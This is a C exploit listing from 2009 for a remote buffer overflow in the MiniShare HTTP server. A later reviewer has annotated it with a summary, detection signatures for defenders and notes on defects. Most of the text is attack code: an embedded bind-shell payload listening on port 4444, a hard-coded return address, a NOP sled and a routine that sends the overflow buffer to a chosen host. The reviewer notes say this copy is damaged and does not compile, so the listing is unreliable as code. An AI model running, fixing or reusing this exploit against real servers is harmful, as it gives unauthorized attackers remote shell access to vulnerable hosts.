
minishare155-overflow.txt

Posted on 20 October 2009

/*
 * MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit
 * by eMP3R0r TEAM
 * This bug Expl0ited and Discovered by iM4n
 * Sp Tnx2 : Shabgard & Aria Security FOrum
 * The Crimson Idol
 *
 * Reviewer summary:
 *   - Proof-of-concept client for a remote buffer overflow in the MiniShare
 *     HTTP server. It opens one TCP connection to the host given in argv[1]
 *     on port 80 (PORT) and sends a single 557-byte buffer (`buffer`).
 *   - The buffer is pre-filled with 0x90 (NOP); the listing labels the
 *     embedded payload as a bind shell that listens on TCP port 4444.
 *   - The header says 1.5.5 while the usage banner in main() says 1.5.4;
 *     the page does not say which versions are actually affected.
 *
 * What a defender can take from it:
 *   - Network side: a connection to the HTTP port that carries a long run of
 *     0x90 bytes is a usable signature for this PoC family.
 *   - Host side: a new listener on TCP 4444 owned by the MiniShare process
 *     (or a child of it) shortly after such a request indicates the payload
 *     ran.
 *   - Exposure: keep the affected server off untrusted networks, filter
 *     inbound TCP 4444, and run it only on hosts with DEP/ASLR enforced.
 *
 * NOTE(review): this copy is damaged and does not build as shown. The byte
 * strings below read "xNN" with no backslash (presumably "\x" escapes lost
 * during extraction), so they are plain ASCII text here, and several
 * statements are flagged inline. Treat the listing as a record of the bug
 * class, not as a working tool.
 */
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dos.h>
#pragma comment(lib, "ws2_32.lib")

/* Size of the buffer that is sent, in bytes. */
#define buffer 557
/* Destination TCP port; hard-coded, the command-line port is never used. */
#define PORT 80
/* Filler byte (x86 NOP opcode). */
#define NOP 0x90

/*
 * Bind Shell open port 4444
 *
 * Payload blob as published. The literal is kept exactly as it appears on
 * the page; see the file header about the missing escape backslashes.
 */
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";

/*
 * Entry point: prints a usage banner when fewer than two arguments are
 * given, otherwise fills the buffer, resolves argv[1], connects to PORT and
 * sends the buffer once. Returns 0 on the normal path and calls exit(-1) on
 * setup failures.
 */
int main(int argc, char *argv[])
{
    int mini1,mini2,tcp;

    /* Two arguments are demanded (host and port), but only argv[1] is read
     * below; the destination port always comes from PORT. */
    if (argc < 3)
    {
        printf(" MiniShare HTTP Server 1.5.4 Remote Buffer overflow Exploit by eMP3R0r TEAM ");
        printf(" This bug Expl0ited and Discovered by iM4n ");
        printf(" Usage : File.exe IPAdress Port ");
        printf(" Ex : iM4n.exe 127.0.0.1 80 ");
        exit(-1);
    }

    /* Outgoing buffer, pre-filled with the NOP byte. */
    char overflow[buffer];
    memset(overflow,NOP,buffer);

    /* Four-byte value, presumably the overwritten return address; hard-coded
     * addresses like this are normally tied to one OS/DLL build (the page
     * does not say which). */
    char win[] = "xEDx1Ex94x7C";

    /* NOTE(review): memset() takes a fill value, not a source buffer, so as
     * written these two calls do not lay the buffer out the way the variable
     * names suggest. */
    memset(overflow,win,sizeof(win)-1);
    memset(overflow,shellcode,sizeof(shellcode)-1);

    /* NOTE(review): index `buffer` is one past the end of overflow[]; this
     * write is out of bounds in the client itself. */
    overflow[buffer] = 0;

    /* Winsock initialisation, requesting version 2.1. */
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2,1),&wsaData) != 0 )
    {
        printf(" windows socket is failed ! ");
        exit(-1);
    }

    /* Resolve argv[1] as a host name first; if that fails, parse it as a
     * dotted-quad address instead. */
    struct hostent *remote;
    remote = gethostbyname (argv[1]);
    if (! remote)
    {
        mini1=inet_addr(argv[1]);
    }
    if ((! remote) && (mini1 == INADDR_NONE))
    {
        printf(" unable ro resolve %s ",argv[1]);
        exit(-1);
    }

    tcp = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (! tcp)
    {
        printf(" Socket Not created ! ");
        exit(-1);
    }

    /* Fill in the destination address from whichever lookup succeeded. */
    struct sockaddr_in http;
    if (remote != NULL)
        /* NOTE(review): struct hostent has no `length` member (Winsock names
         * it h_length), so this line does not compile as shown. */
        memset(&(http.sin_addr),remote->h_addr,remote->length);
    else
        http.sin_addr.s_addr = mini1;
    if(remote)
        http.sin_family = remote->h_addrtype;
    else
        http.sin_family = AF_INET;
    http.sin_port = htons(PORT);

    /* Progress messages separated by delays; the delays have no protocol
     * role. */
    printf(" Attacking on HTTP Server ...! %s ",argv[1]);
    sleep(400);
    printf(" Sending String on Target ... ",sizeof(overflow));
    sleep(300);

    mini2 = connect (tcp ,(struct sockaddr *) &http,sizeof(struct sockaddr_in));
    if(mini2 == 0)
    {
        printf(" Sending Socket ...! ");
        sleep(500);
        printf(" connecting ...! ");
        /* The whole buffer goes out in a single send(); the return value is
         * not checked and no reply is read from the server. */
        send(tcp,overflow,sizeof(overflow),0);
        printf(" Exploit Done ! ");
        // attack on port 4444
        /* Success is only assumed: the message points the operator at TCP
         * 4444, the same port a defender should watch for a new listener. */
        printf(" exploit runed ! please telnet ip address and Port 4444 ! ");
    }
    else
    {
        /* Reached when connect() to PORT fails. */
        printf(" Exploit not done and ip address machin not listening in Port 4444! ");
    }

    /* 1 is SD_SEND in Winsock: stop sending, then close the socket. */
    shutdown(tcp,1);
    closesocket(tcp);
    return 0;
}

 
